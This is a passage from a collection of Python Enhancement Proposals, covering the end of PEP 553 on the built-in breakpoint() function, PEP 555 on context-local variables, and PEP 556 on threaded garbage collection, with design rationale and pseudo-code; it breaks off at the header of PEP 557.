IDEs have user interface for setting breakpoints, it may still be more
convenient to just edit the code. The APIs for entering the debugger
programmatically are inconsistent, so it can be difficult to remember exactly
what to type.
We can solve all these problems by providing a universal API for entering the
debugger, as proposed in this PEP.
Proposal
The JavaScript language provides a debugger statement [js-debugger] which enters
the debugger at the point where the statement appears.
This PEP proposes a new built-in function called breakpoint()
which enters a Python debugger at the call site. Thus the example
above would be written like so:
foo()
breakpoint()
bar()
Further, this PEP proposes two new name bindings for the sys
module, called sys.breakpointhook() and
sys.__breakpointhook__. By default, sys.breakpointhook()
implements the actual importing and entry into pdb.set_trace(),
and it can be set to a different function to change the debugger that
breakpoint() enters.
sys.__breakpointhook__ is initialized to the same function as
sys.breakpointhook() so that you can always easily reset
sys.breakpointhook() to the default value (e.g. by doing
sys.breakpointhook = sys.__breakpointhook__). This is exactly the same as
how the existing sys.displayhook() / sys.__displayhook__ and
sys.excepthook() / sys.__excepthook__ work [hooks].
The signature of the built-in is breakpoint(*args, **kws). The positional
and keyword arguments are passed straight through to sys.breakpointhook()
and the signatures must match or a TypeError will be raised. The return
from sys.breakpointhook() is passed back up to, and returned from
breakpoint().
The rationale for this is based on the observation that the underlying
debuggers may accept additional optional arguments. For example, IPython
allows you to specify a string that gets printed when the break point is
entered [ipython-embed]. As of Python 3.7, the pdb module also supports an
optional header argument [pdb-header].
Environment variable
The default implementation of sys.breakpointhook() consults a new
environment variable called PYTHONBREAKPOINT. This environment variable
can have various values:
PYTHONBREAKPOINT=0 disables debugging. Specifically, with this value
sys.breakpointhook() returns None immediately.
PYTHONBREAKPOINT= (i.e. the empty string). This is the same as not
setting the environment variable at all, in which case pdb.set_trace()
is run as usual.
PYTHONBREAKPOINT=some.importable.callable. In this case,
sys.breakpointhook() imports the some.importable module and gets the
callable object from the resulting module, which it then calls. The
value may be a string with no dots, in which case it names a built-in
callable, e.g. PYTHONBREAKPOINT=int. (Guido has expressed the
preference for normal Python dotted-paths, not setuptools-style entry point
syntax [syntax].)
This environment variable allows external processes to control how breakpoints
are handled. Some uses cases include:
Completely disabling all accidental breakpoint() calls pushed to
production. This could be accomplished by setting PYTHONBREAKPOINT=0 in
the execution environment. Another suggestion by reviewers of the PEP was
to set PYTHONBREAKPOINT=sys.exit in this case.
IDE integration with specialized debuggers for embedded execution. The IDE
would run the program in its debugging environment with PYTHONBREAKPOINT
set to their internal debugging hook.
PYTHONBREAKPOINT is re-interpreted every time sys.breakpointhook() is
reached. This allows processes to change its value during the execution of a
program and have breakpoint() respond to those changes. It is not
considered a performance critical section since entering a debugger by
definition stops execution. Thus, programs can do the following:
os.environ['PYTHONBREAKPOINT'] = 'foo.bar.baz'
breakpoint() # Imports foo.bar and calls foo.bar.baz()
Overriding sys.breakpointhook defeats the default consultation of
PYTHONBREAKPOINT. It is up to the overriding code to consult
PYTHONBREAKPOINT if they want.
If access to the PYTHONBREAKPOINT callable fails in any way (e.g. the
import fails, or the resulting module does not contain the callable), a
RuntimeWarning is issued, and no breakpoint function is called.
Note that as with all other PYTHON* environment variables,
PYTHONBREAKPOINT is ignored when the interpreter is started with
-E. This means the default behavior will occur
(i.e. pdb.set_trace() will run). There was some discussion about
alternatively treating PYTHONBREAKPOINT=0 when -E as in
effect, but the opinions were inconclusive, so it was decided that
this wasn’t special enough for a special case.
Implementation
A pull request exists with the proposed implementation [impl].
While the actual implementation is in C, the Python pseudo-code for this
feature looks roughly like the following:
# In builtins.
def breakpoint(*args, **kws):
import sys
missing = object()
hook = getattr(sys, 'breakpointhook', missing)
if hook is missing:
raise RuntimeError('lost sys.breakpointhook')
return hook(*args, **kws)
# In sys.
def breakpointhook(*args, **kws):
import importlib, os, warnings
hookname = os.getenv('PYTHONBREAKPOINT')
if hookname is None or len(hookname) == 0:
hookname = 'pdb.set_trace'
elif hookname == '0':
return None
modname, dot, funcname = hookname.rpartition('.')
if dot == '':
modname = 'builtins'
try:
module = importlib.import_module(modname)
hook = getattr(module, funcname)
except:
warnings.warn(
'Ignoring unimportable $PYTHONBREAKPOINT: {}'.format(
hookname),
RuntimeWarning)
return None
return hook(*args, **kws)
__breakpointhook__ = breakpointhook
Rejected alternatives
A new keyword
Originally, the author considered a new keyword, or an extension to an
existing keyword such as break here. This is rejected on several fronts.
A brand new keyword would require a __future__ to enable it since almost
any new keyword could conflict with existing code. This negates the ease
with which you can enter the debugger.
An extended keyword such as break here, while more readable and not
requiring a __future__ would tie the keyword extension to this new
feature, preventing more useful extensions such as those proposed in
PEP 548.
A new keyword would require a modified grammar and likely a new bytecode.
Each of these makes the implementation more complex. A new built-in breaks
no existing code (since any existing module global would just shadow the
built-in) and is quite easy to implement.
sys.breakpoint()
Why not sys.breakpoint()? Requiring an import to invoke the debugger is
explicitly rejected because sys is not imported in every module. That
just requires more typing and would lead to:
import sys; sys.breakpoint()
which inherits several of the problems this PEP aims to solve.
Version History
2019-10-13
Add missing return None in except clause to pseudo-code.
2017-09-13
The PYTHONBREAKPOINT environment variable is made a first class
feature.
2017-09-07
debug() renamed to breakpoint()
Signature changed to breakpoint(*args, **kws) which is passed straight
through to sys.breakpointhook().
References
[ipython-embed]
http://ipython.readthedocs.io/en/stable/api/generated/IPython.terminal.embed.html
[pdb-header]
https://docs.python.org/3.7/library/pdb.html#pdb.set_trace
[linters]
http://flake8.readthedocs.io/en/latest/
[js-debugger]
https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Statements/debugger
[hooks]
https://docs.python.org/3/library/sys.html#sys.displayhook
[syntax]
http://setuptools.readthedocs.io/en/latest/setuptools.html?highlight=console#automatic-script-creation
[impl]
https://github.com/python/cpython/pull/3355
Copyright
This document has been placed in the public domain.
| Final | PEP 553 – Built-in breakpoint() | Standards Track | This PEP proposes adding a new built-in function called breakpoint() which
enters a Python debugger at the point of the call. Additionally, two new
names are added to the sys module to make the choice of which debugger is
entered configurable. |
PEP 555 – Context-local variables (contextvars)
Author:
Koos Zevenhoven
Status:
Withdrawn
Type:
Standards Track
Created:
06-Sep-2017
Python-Version:
3.7
Post-History:
06-Sep-2017
Table of Contents
Abstract
Rationale
Proposal
Semantics and higher-level API
Core concept
Refactoring into subroutines
Semantics for generators and generator-based coroutines
Special functionality for framework authors
Leaking yields
Capturing contextvar assignments
Getting a snapshot of context state
Running code in a clean state
Implementation
Data structures and implementation of the core concept
Implementation of generator and coroutine semantics
More on implementation
Backwards compatibility
Open Issues
Out-of-order de-assignments
Rejected Ideas
Dynamic scoping linked to subroutine scopes
Acknowledgements
References
Copyright
Abstract
Sometimes, in special cases, it is desired that code can pass information down the function call chain to the callees without having to explicitly pass the information as arguments to each function in the call chain. This proposal describes a construct which allows code to explicitly switch in and out of a context where a certain context variable has a given value assigned to it. This is a modern alternative to some uses of things like global variables in traditional single-threaded (or thread-unsafe) code and of thread-local storage in traditional concurrency-unsafe code (single- or multi-threaded). In particular, the proposed mechanism can also be used with more modern concurrent execution mechanisms such as asynchronously executed coroutines, without the concurrently executed call chains interfering with each other’s contexts.
The “call chain” can consist of normal functions, awaited coroutines, or generators. The semantics of context variable scope are equivalent in all cases, allowing code to be refactored freely into subroutines (which here refers to functions, sub-generators or sub-coroutines) without affecting the semantics of context variables. Regarding implementation, this proposal aims at simplicity and minimum changes to the CPython interpreter and to other Python interpreters.
Rationale
Consider a modern Python call chain (or call tree), which in this proposal refers to any chained (nested) execution of subroutines, using any possible combinations of normal function calls, or expressions using await or yield from. In some cases, passing necessary information down the call chain as arguments can substantially complicate the required function signatures, or it can even be impossible to achieve in practice. In these cases, one may search for another place to store this information. Let us look at some historical examples.
The most naive option is to assign the value to a global variable or similar, where the code down the call chain can access it. However, this immediately makes the code thread-unsafe, because with multiple threads, all threads assign to the same global variable, and another thread can interfere at any point in the call chain. Sooner or later, someone will probably find a reason to run the same code in parallel threads.
A somewhat less naive option is to store the information as per-thread information in thread-local storage, where each thread has its own “copy” of the variable which other threads cannot interfere with. Although non-ideal, this has been the best solution in many cases. However, thanks to generators and coroutines, the execution of the call chain can be suspended and resumed, allowing code in other contexts to run concurrently. Therefore, using thread-local storage is concurrency-unsafe, because other call chains in other contexts may interfere with the thread-local variable.
Note that in the above two historical approaches, the stored information has the widest available scope without causing problems. For a third solution along the same path, one would first define an equivalent of a “thread” for asynchronous execution and concurrency. This could be seen as the largest amount of code and nested calls that is guaranteed to be executed sequentially without ambiguity in execution order. This might be referred to as concurrency-local or task-local storage. In this meaning of “task”, there is no ambiguity in the order of execution of the code within one task. (This concept of a task is close to equivalent to a Task in asyncio, but not exactly.) In such concurrency-locals, it is possible to pass information down the call chain to callees without another code path interfering with the value in the background.
Common to the above approaches is that they indeed use variables with a wide but just-narrow-enough scope. Thread-locals could also be called thread-wide globals—in single-threaded code, they are indeed truly global. And task-locals could be called task-wide globals, because tasks can be very big.
The issue here is that neither global variables, thread-locals nor task-locals are really meant to be used for this purpose of passing information of the execution context down the call chain. Instead of the widest possible variable scope, the scope of the variables should be controlled by the programmer, typically of a library, to have the desired scope—not wider. In other words, task-local variables (and globals and thread-locals) have nothing to do with the kind of context-bound information passing that this proposal intends to enable, even if task-locals can be used to emulate the desired semantics. Therefore, in the following, this proposal describes the semantics and the outlines of an implementation for context-local variables (or context variables, contextvars). In fact, as a side effect of this PEP, an async framework can use the proposed feature to implement task-local variables.
Proposal
Because the proposed semantics are not a direct extension to anything already available in Python, this proposal is first described in terms of semantics and API at a fairly high level. In particular, Python with statements are heavily used in the description, as they are a good match with the proposed semantics. However, the underlying __enter__ and __exit__ methods correspond to functions in the lower-level speed-optimized (C) API. For clarity of this document, the lower-level functions are not explicitly named in the definition of the semantics. After describing the semantics and high-level API, the implementation is described, going to a lower level.
Semantics and higher-level API
Core concept
A context-local variable is represented by a single instance of contextvars.Var, say cvar. Any code that has access to the cvar object can ask for its value with respect to the current context. In the high-level API, this value is given by the cvar.value property:
cvar = contextvars.Var(default="the default value",
description="example context variable")
assert cvar.value == "the default value" # default still applies
# In code examples, all ``assert`` statements should
# succeed according to the proposed semantics.
No assignments to cvar have been applied for this context, so cvar.value gives the default value. Assigning new values to contextvars is done in a highly scope-aware manner:
with cvar.assign(new_value):
assert cvar.value is new_value
# Any code here, or down the call chain from here, sees:
# cvar.value is new_value
# unless another value has been assigned in a
# nested context
assert cvar.value is new_value
# the assignment of ``cvar`` to ``new_value`` is no longer visible
assert cvar.value == "the default value"
Here, cvar.assign(value) returns another object, namely contextvars.Assignment(cvar, new_value). The essential part here is that applying a context variable assignment (Assignment.__enter__) is paired with a de-assignment (Assignment.__exit__). These operations set the bounds for the scope of the assigned value.
Assignments to the same context variable can be nested to override the outer assignment in a narrower context:
assert cvar.value == "the default value"
with cvar.assign("outer"):
assert cvar.value == "outer"
with cvar.assign("inner"):
assert cvar.value == "inner"
assert cvar.value == "outer"
assert cvar.value == "the default value"
Also multiple variables can be assigned to in a nested manner without affecting each other:
cvar1 = contextvars.Var()
cvar2 = contextvars.Var()
assert cvar1.value is None # default is None by default
assert cvar2.value is None
with cvar1.assign(value1):
assert cvar1.value is value1
assert cvar2.value is None
with cvar2.assign(value2):
assert cvar1.value is value1
assert cvar2.value is value2
assert cvar1.value is value1
assert cvar2.value is None
assert cvar1.value is None
assert cvar2.value is None
Or with more convenient Python syntax:
with cvar1.assign(value1), cvar2.assign(value2):
assert cvar1.value is value1
assert cvar2.value is value2
In another context, in another thread or otherwise concurrently executed task or code path, the context variables can have a completely different state. The programmer thus only needs to worry about the context at hand.
Refactoring into subroutines
Code using contextvars can be refactored into subroutines without affecting the semantics. For instance:
assi = cvar.assign(new_value)
def apply():
assi.__enter__()
assert cvar.value == "the default value"
apply()
assert cvar.value is new_value
assi.__exit__()
assert cvar.value == "the default value"
Or similarly in an asynchronous context where await expressions are used. The subroutine can now be a coroutine:
assi = cvar.assign(new_value)
async def apply():
assi.__enter__()
assert cvar.value == "the default value"
await apply()
assert cvar.value is new_value
assi.__exit__()
assert cvar.value == "the default value"
Or when the subroutine is a generator:
def apply():
yield
assi.__enter__()
which is called using yield from apply() or with calls to next or .send. This is discussed further in later sections.
Semantics for generators and generator-based coroutines
Generators, coroutines and async generators act as subroutines in much the same way that normal functions do. However, they have the additional possibility of being suspended by yield expressions. Assignment contexts entered inside a generator are normally preserved across yields:
def genfunc():
with cvar.assign(new_value):
assert cvar.value is new_value
yield
assert cvar.value is new_value
g = genfunc()
next(g)
assert cvar.value == "the default value"
with cvar.assign(another_value):
next(g)
However, the outer context visible to the generator may change state across yields:
def genfunc():
assert cvar.value is value2
yield
assert cvar.value is value1
yield
with cvar.assign(value3):
assert cvar.value is value3
with cvar.assign(value1):
g = genfunc()
with cvar.assign(value2):
next(g)
next(g)
next(g)
assert cvar.value is value1
Similar semantics apply to async generators defined by async def ... yield ... ).
By default, values assigned inside a generator do not leak through yields to the code that drives the generator. However, the assignment contexts entered and left open inside the generator do become visible outside the generator after the generator has finished with a StopIteration or another exception:
assi = cvar.assign(new_value)
def genfunc():
yield
assi.__enter__():
yield
g = genfunc()
assert cvar.value == "the default value"
next(g)
assert cvar.value == "the default value"
next(g) # assi.__enter__() is called here
assert cvar.value == "the default value"
next(g)
assert cvar.value is new_value
assi.__exit__()
Special functionality for framework authors
Frameworks, such as asyncio or third-party libraries, can use additional functionality in contextvars to achieve the desired semantics in cases which are not determined by the Python interpreter. Some of the semantics described in this section are also afterwards used to describe the internal implementation.
Leaking yields
Using the contextvars.leaking_yields decorator, one can choose to leak the context through yield expressions into the outer context that drives the generator:
@contextvars.leaking_yields
def genfunc():
assert cvar.value == "outer"
with cvar.assign("inner"):
yield
assert cvar.value == "inner"
assert cvar.value == "outer"
g = genfunc():
with cvar.assign("outer"):
assert cvar.value == "outer"
next(g)
assert cvar.value == "inner"
next(g)
assert cvar.value == "outer"
Capturing contextvar assignments
Using contextvars.capture(), one can capture the assignment contexts that are entered by a block of code. The changes applied by the block of code can then be reverted and subsequently reapplied, even in another context:
assert cvar1.value is None # default
assert cvar2.value is None # default
assi1 = cvar1.assign(value1)
assi2 = cvar1.assign(value2)
with contextvars.capture() as delta:
assi1.__enter__()
with cvar2.assign("not captured"):
assert cvar2.value is "not captured"
assi2.__enter__()
assert cvar1.value is value2
delta.revert()
assert cvar1.value is None
assert cvar2.value is None
...
with cvar1.assign(1), cvar2.assign(2):
delta.reapply()
assert cvar1.value is value2
assert cvar2.value == 2
However, reapplying the “delta” if its net contents include deassignments may not be possible (see also Implementation and Open Issues).
Getting a snapshot of context state
The function contextvars.get_local_state() returns an object representing the applied assignments to all context-local variables in the context where the function is called. This can be seen as equivalent to using contextvars.capture() to capture all context changes from the beginning of execution. The returned object supports methods .revert() and reapply() as above.
Running code in a clean state
Although it is possible to revert all applied context changes using the above primitives, a more convenient way to run a block of code in a clean context is provided:
with context_vars.clean_context():
# here, all context vars start off with their default values
# here, the state is back to what it was before the with block.
Implementation
This section describes to a variable level of detail how the described semantics can be implemented. At present, an implementation aimed at simplicity but sufficient features is described. More details will be added later.
Alternatively, a somewhat more complicated implementation offers minor additional features while adding some performance overhead and requiring more code in the implementation.
Data structures and implementation of the core concept
Each thread of the Python interpreter keeps its own stack of contextvars.Assignment objects, each having a pointer to the previous (outer) assignment like in a linked list. The local state (also returned by contextvars.get_local_state()) then consists of a reference to the top of the stack and a pointer/weak reference to the bottom of the stack. This allows efficient stack manipulations. An object produced by contextvars.capture() is similar, but refers to only a part of the stack with the bottom reference pointing to the top of the stack as it was in the beginning of the capture block.
Now, the stack evolves according to the assignment __enter__ and __exit__ methods. For example:
cvar1 = contextvars.Var()
cvar2 = contextvars.Var()
# stack: []
assert cvar1.value is None
assert cvar2.value is None
with cvar1.assign("outer"):
# stack: [Assignment(cvar1, "outer")]
assert cvar1.value == "outer"
with cvar1.assign("inner"):
# stack: [Assignment(cvar1, "outer"),
# Assignment(cvar1, "inner")]
assert cvar1.value == "inner"
with cvar2.assign("hello"):
# stack: [Assignment(cvar1, "outer"),
# Assignment(cvar1, "inner"),
# Assignment(cvar2, "hello")]
assert cvar2.value == "hello"
# stack: [Assignment(cvar1, "outer"),
# Assignment(cvar1, "inner")]
assert cvar1.value == "inner"
assert cvar2.value is None
# stack: [Assignment(cvar1, "outer")]
assert cvar1.value == "outer"
# stack: []
assert cvar1.value is None
assert cvar2.value is None
Getting a value from the context using cvar1.value can be implemented as finding the topmost occurrence of a cvar1 assignment on the stack and returning the value there, or the default value if no assignment is found on the stack. However, this can be optimized to instead be an O(1) operation in most cases. Still, even searching through the stack may be reasonably fast since these stacks are not intended to grow very large.
The above description is already sufficient for implementing the core concept. Suspendable frames require some additional attention, as explained in the following.
Implementation of generator and coroutine semantics
Within generators, coroutines and async generators, assignments and deassignments are handled in exactly the same way as anywhere else. However, some changes are needed in the builtin generator methods send, __next__, throw and close. Here is the Python equivalent of the changes needed in send for a generator (here _old_send refers to the behavior in Python 3.6):
def send(self, value):
if self.gi_contextvars is LEAK:
# If decorated with contextvars.leaking_yields.
# Nothing needs to be done to leak context through yields :)
return self._old_send(value)
try:
with contextvars.capture() as delta:
if self.gi_contextvars:
# non-zero captured content from previous iteration
self.gi_contextvars.reapply()
ret = self._old_send(value)
except Exception:
raise # back to the calling frame (e.g. StopIteration)
else:
# suspending, revert context changes but save them for later
delta.revert()
self.gi_contextvars = delta
return ret
The corresponding modifications to the other methods is essentially identical. The same applies to coroutines and async generators.
For code that does not use contextvars, the additions are O(1) and essentially reduce to a couple of pointer comparisons. For code that does use contextvars, the additions are still O(1) in most cases.
More on implementation
The rest of the functionality, including contextvars.leaking_yields, contextvars.capture(), contextvars.get_local_state() and contextvars.clean_context() are in fact quite straightforward to implement, but their implementation will be discussed further in later versions of this proposal. Caching of assigned values is somewhat more complicated, and will be discussed later, but it seems that most cases should achieve O(1) complexity.
Backwards compatibility
There are no direct backwards-compatibility concerns, since a completely new feature is proposed.
However, various traditional uses of thread-local storage may need a smooth transition to contextvars so they can be concurrency-safe. There are several approaches to this, including emulating task-local storage with a little bit of help from async frameworks. A fully general implementation cannot be provided, because the desired semantics may depend on the design of the framework.
Another way to deal with the transition is for code to first look for a context created using contextvars. If that fails because a new-style context has not been set or because the code runs on an older Python version, a fallback to thread-local storage is used.
Open Issues
Out-of-order de-assignments
In this proposal, all variable deassignments are made in the opposite order compared to the preceding assignments. This has two useful properties: it encourages using with statements to define assignment scope and has a tendency to catch errors early (forgetting a .__exit__() call often results in a meaningful error. To have this as a requirement is beneficial also in terms of implementation simplicity and performance. Nevertheless, allowing out-of-order context exits is not completely out of the question, and reasonable implementation strategies for that do exist.
Rejected Ideas
Dynamic scoping linked to subroutine scopes
The scope of value visibility should not be determined by the way the code is refactored into subroutines. It is necessary to have per-variable control of the assignment scope.
Acknowledgements
To be added.
References
To be added.
Copyright
This document has been placed in the public domain.
| Withdrawn | PEP 555 – Context-local variables (contextvars) | Standards Track | Sometimes, in special cases, it is desired that code can pass information down the function call chain to the callees without having to explicitly pass the information as arguments to each function in the call chain. This proposal describes a construct which allows code to explicitly switch in and out of a context where a certain context variable has a given value assigned to it. This is a modern alternative to some uses of things like global variables in traditional single-threaded (or thread-unsafe) code and of thread-local storage in traditional concurrency-unsafe code (single- or multi-threaded). In particular, the proposed mechanism can also be used with more modern concurrent execution mechanisms such as asynchronously executed coroutines, without the concurrently executed call chains interfering with each other’s contexts. |
PEP 556 – Threaded garbage collection
Author:
Antoine Pitrou <solipsis at pitrou.net>
Status:
Deferred
Type:
Standards Track
Created:
08-Sep-2017
Python-Version:
3.7
Post-History:
08-Sep-2017
Table of Contents
Deferral Notice
Abstract
Terminology
Rationale
Proposal
New public APIs
Intended use
Non-goals
Internal details
gc module
threading module
Pseudo-code
Discussion
Default mode
Explicit collections
Impact on memory use
Impact on CPU consumption
Impact on GC pauses
Open issues
Implementation
References
Copyright
Deferral Notice
This PEP is currently not being actively worked on. It may be revived
in the future. The main missing steps are:
polish the implementation, adapting the test suite where necessary;
ensure setting threaded garbage collection does not disrupt existing
code in unexpected ways (expected impact includes lengthening the
lifetime of objects in reference cycles).
Abstract
This PEP proposes a new optional mode of operation for CPython’s cyclic
garbage collector (GC) where implicit (i.e. opportunistic) collections
happen in a dedicated thread rather than synchronously.
Terminology
An “implicit” GC run (or “implicit” collection) is one that is triggered
opportunistically based on a certain heuristic computed over allocation
statistics, whenever a new allocation is requested. Details of the
heuristic are not relevant to this PEP, as it does not propose to change it.
An “explicit” GC run (or “explicit” collection) is one that is requested
programmatically by an API call such as gc.collect.
“Threaded” refers to the fact that GC runs happen in a dedicated thread
separate from sequential execution of application code. It does not mean
“concurrent” (the Global Interpreter Lock, or GIL, still serializes
execution among Python threads including the dedicated GC thread)
nor “parallel” (the GC is not able to distribute its work onto several
threads at once to lower wall-clock latencies of GC runs).
Rationale
The mode of operation for the GC has always been to perform implicit
collections synchronously. That is, whenever the aforementioned heuristic
is activated, execution of application code in the current thread is
suspended and the GC is launched in order to reclaim dead reference
cycles.
There is a catch, though. Over the course of reclaiming dead reference
cycles (and any ancillary objects hanging at those cycles), the GC can
execute arbitrary finalization code in the form of __del__ methods
and weakref callbacks. Over the years, Python has been used for more
and more sophisticated purposes, and it is increasingly common for
finalization code to perform complex tasks, for example in distributed
systems where loss of an object may require notifying other (logical
or physical) nodes.
Interrupting application code at arbitrary points to execute finalization
code that may rely on a consistent internal state and/or on acquiring
synchronization primitives gives rise to reentrancy issues that even the
most seasoned experts have trouble fixing properly [1].
This PEP bases itself on the observation that, despite the apparent
similarities, same-thread reentrancy is a fundamentally harder
problem than multi-thread synchronization. Instead of letting each
developer or library author struggle with extremely hard reentrancy
issues, one by one, this PEP proposes to allow the GC to run in a
separate thread where well-known multi-thread synchronization practices
are sufficient.
Proposal
Under this PEP, the GC has two modes of operation:
“serial”, which is the default and legacy mode, where an implicit GC
run is performed immediately in the thread that detects such an implicit
run is desired (based on the aforementioned allocation heuristic).
“threaded”, which can be explicitly enabled at runtime on a per-process
basis, where implicit GC runs are scheduled whenever the allocation
heuristic is triggered, but run in a dedicated background thread.
Hard reentrancy problems which plague sophisticated uses of finalization
callbacks in the “serial” mode become relatively easy multi-thread
synchronization problems in the “threaded” mode of operation.
The GC also traditionally allows for explicit GC runs, using the Python
API gc.collect and the C API PyGC_Collect. The visible semantics
of these two APIs are left unchanged: they perform a GC run immediately
when called, and only return when the GC run is finished.
New public APIs
Two new Python APIs are added to the gc module:
gc.set_mode(mode) sets the current mode of operation (either “serial”
or “threaded”). If setting to “serial” and the current mode is
“threaded”, then the function also waits for the GC thread to end.
gc.get_mode() returns the current mode of operation.
It is allowed to switch back and forth between modes of operation.
Intended use
Given the per-process nature of the switch and its repercussions on
semantics of all finalization callbacks, it is recommended that it is
set at the beginning of an application’s code (and/or in initializers
for child processes e.g. when using multiprocessing). Library functions
should probably not mess with this setting, just as they shouldn’t call
gc.enable or gc.disable, but there’s nothing to prevent them from
doing so.
Non-goals
This PEP does not address reentrancy issues with other kinds of
asynchronous code execution (for example signal handlers registered
with the signal module). The author believes that the overwhelming
majority of painful reentrancy issues occur with finalizers. Most of the
time, signal handlers are able to set a single flag and/or wake up a
file descriptor for the main program to notice. As for those signal
handlers which raise an exception, they have to execute in-thread.
This PEP also does not change the execution of finalization callbacks
when they are called as part of regular reference counting, i.e. when
releasing a visible reference drops an object’s reference count to zero.
Since such execution happens at deterministic points in code, it is usually
not a problem.
Internal details
TODO: Update this section to conform to the current implementation.
gc module
An internal flag gc_is_threaded is added, telling whether GC is serial
or threaded.
An internal structure gc_mutex is added to avoid two GC runs at once:
static struct {
PyThread_type_lock lock; /* taken when collecting */
PyThreadState *owner; /* whichever thread is currently collecting
(NULL if no collection is taking place) */
} gc_mutex;
An internal structure gc_thread is added to handle synchronization with
the GC thread:
static struct {
PyThread_type_lock wakeup; /* acts as an event
to wake up the GC thread */
int collection_requested; /* non-zero if collection requested */
PyThread_type_lock done; /* acts as an event signaling
the GC thread has exited */
} gc_thread;
threading module
Two private functions are added to the threading module:
threading._ensure_dummy_thread(name) creates and registers a Thread
instance for the current thread with the given name, and returns it.
threading._remove_dummy_thread(thread) removes the given thread
(as returned by _ensure_dummy_thread) from the threading module’s
internal state.
The purpose of these two functions is to improve debugging and introspection
by letting threading.current_thread() return a more meaningfully-named
object when called inside a finalization callback in the GC thread.
Pseudo-code
Here is a proposed pseudo-code for the main primitives, public and internal,
required for implementing this PEP. All of them will be implemented in C
and live inside the gc module, unless otherwise noted:
def collect_with_callback(generation):
"""
Collect up to the given *generation*.
"""
# Same code as currently (see collect_with_callback() in gcmodule.c)
def collect_generations():
"""
Collect as many generations as desired by the heuristic.
"""
# Same code as currently (see collect_generations() in gcmodule.c)
def lock_and_collect(generation=-1):
"""
Perform a collection with thread safety.
"""
me = PyThreadState_GET()
if gc_mutex.owner == me:
# reentrant GC collection request, bail out
return
Py_BEGIN_ALLOW_THREADS
gc_mutex.lock.acquire()
Py_END_ALLOW_THREADS
gc_mutex.owner = me
try:
if generation >= 0:
return collect_with_callback(generation)
else:
return collect_generations()
finally:
gc_mutex.owner = NULL
gc_mutex.lock.release()
def schedule_gc_request():
"""
Ask the GC thread to run an implicit collection.
"""
assert gc_is_threaded == True
# Note this is extremely fast if a collection is already requested
if gc_thread.collection_requested == False:
gc_thread.collection_requested = True
gc_thread.wakeup.release()
def is_implicit_gc_desired():
"""
Whether an implicit GC run is currently desired based on allocation
stats. Return a generation number, or -1 if none desired.
"""
# Same heuristic as currently (see _PyObject_GC_Alloc in gcmodule.c)
def PyGC_Malloc():
"""
Allocate a GC-enabled object.
"""
# Update allocation statistics (same code as currently, omitted for brevity)
if is_implicit_gc_desired():
if gc_is_threaded:
schedule_gc_request()
else:
lock_and_collect()
# Go ahead with allocation (same code as currently, omitted for brevity)
def gc_thread(interp_state):
"""
Dedicated loop for threaded GC.
"""
# Init Python thread state (omitted, see t_bootstrap in _threadmodule.c)
# Optional: init thread in Python threading module, for better introspection
me = threading._ensure_dummy_thread(name="GC thread")
while gc_is_threaded == True:
Py_BEGIN_ALLOW_THREADS
gc_thread.wakeup.acquire()
Py_END_ALLOW_THREADS
if gc_thread.collection_requested != 0:
gc_thread.collection_requested = 0
lock_and_collect(generation=-1)
threading._remove_dummy_thread(me)
# Signal we're exiting
gc_thread.done.release()
# Free Python thread state (omitted)
def gc.set_mode(mode):
"""
Set current GC mode. This is a process-global setting.
"""
if mode == "threaded":
if not gc_is_threaded == False:
# Launch thread
gc_thread.done.acquire(block=False) # should not fail
gc_is_threaded = True
PyThread_start_new_thread(gc_thread)
elif mode == "serial":
if gc_is_threaded == True:
# Wake up thread, asking it to end
gc_is_threaded = False
gc_thread.wakeup.release()
# Wait for thread exit
Py_BEGIN_ALLOW_THREADS
gc_thread.done.acquire()
Py_END_ALLOW_THREADS
gc_thread.done.release()
else:
raise ValueError("unsupported mode %r" % (mode,))
def gc.get_mode(mode):
"""
Get current GC mode.
"""
return "threaded" if gc_is_threaded else "serial"
def gc.collect(generation=2):
"""
Schedule collection of the given generation and wait for it to
finish.
"""
return lock_and_collect(generation)
Discussion
Default mode
One may wonder whether the default mode should simply be changed to “threaded”.
For multi-threaded applications, it would probably not be a problem:
those applications must already be prepared for finalization handlers to
be run in arbitrary threads. In single-thread applications, however, it
is currently guaranteed that finalizers will always be called in the main
thread. Breaking this property may induce subtle behaviour changes or bugs,
for example if finalizers rely on some thread-local values.
Another problem is when a program uses fork() for concurrency.
Calling fork() from a single-threaded program is safe,
but it’s fragile (to say the least) if the program is multi-threaded.
Explicit collections
One may ask whether explicit collections should also be delegated to the
background thread. The answer is it doesn’t really matter: since
gc.collect and PyGC_Collect actually wait for the collection to
end (breaking this property would break compatibility), delegating the
actual work to a background thread wouldn’t ease synchronization with the
thread requesting an explicit collection.
In the end, this PEP choses the behaviour that seems simpler to implement
based on the pseudo-code above.
Impact on memory use
The “threaded” mode incurs a slight delay in implicit collections compared
to the default “serial” mode. This obviously may change the memory profile
of certain applications. By how much remains to be measured in real-world
use, but we expect the impact to remain minor and bearable. First because
implicit collections are based on a heuristic whose effect does not result
in deterministic visible behaviour anyway. Second because the GC deals
with reference cycles while many objects are reclaimed immediately when their
last visible reference disappears.
Impact on CPU consumption
The pseudo-code above adds two lock operations for each implicit collection
request in “threaded” mode: one in the thread making the request (a
release call) and one in the GC thread (an acquire call).
It also adds two other lock operations, regardless of the current mode,
around each actual collection.
We expect the cost of those lock operations to be very small, on modern
systems, compared to the actual cost of crawling through the chains of
pointers during the collection itself (“pointer chasing” being one of
the hardest workloads on modern CPUs, as it lends itself poorly to
speculation and superscalar execution).
Actual measurements on worst-case mini-benchmarks may help provide
reassuring upper bounds.
Impact on GC pauses
While this PEP does not concern itself with GC pauses, there is a
practical chance that releasing the GIL at some point during an implicit
collection (for example by virtue of executing a pure Python finalizer)
will allow application code to run in-between, lowering the visible GC
pause time for some applications.
If this PEP is accepted, future work may try to better realize this potential
by speculatively releasing the GIL during collections, though it is unclear
how doable that is.
Open issues
gc.set_mode should probably be protected against multiple concurrent
invocations. Also, it should raise when called from inside a GC run
(i.e. from a finalizer).
What happens at shutdown? Does the GC thread run until _PyGC_Fini()
is called?
Implementation
A draft implementation is available in the threaded_gc branch
[2] of the author’s Github fork [3].
References
[1]
https://bugs.python.org/issue14976
[2]
https://github.com/pitrou/cpython/tree/threaded_gc
[3]
https://github.com/pitrou/cpython/
Copyright
This document has been placed in the public domain.
| Deferred | PEP 556 – Threaded garbage collection | Standards Track | This PEP proposes a new optional mode of operation for CPython’s cyclic
garbage collector (GC) where implicit (i.e. opportunistic) collections
happen in a dedicated thread rather than synchronously. |
PEP 557 – Data Classes
Author:
Eric V. Smith <eric at trueblade.com>
Status:
Final
Type:
Standards Track
Created:
02-Jun-2017
Python-Version:
3.7
Post-History:
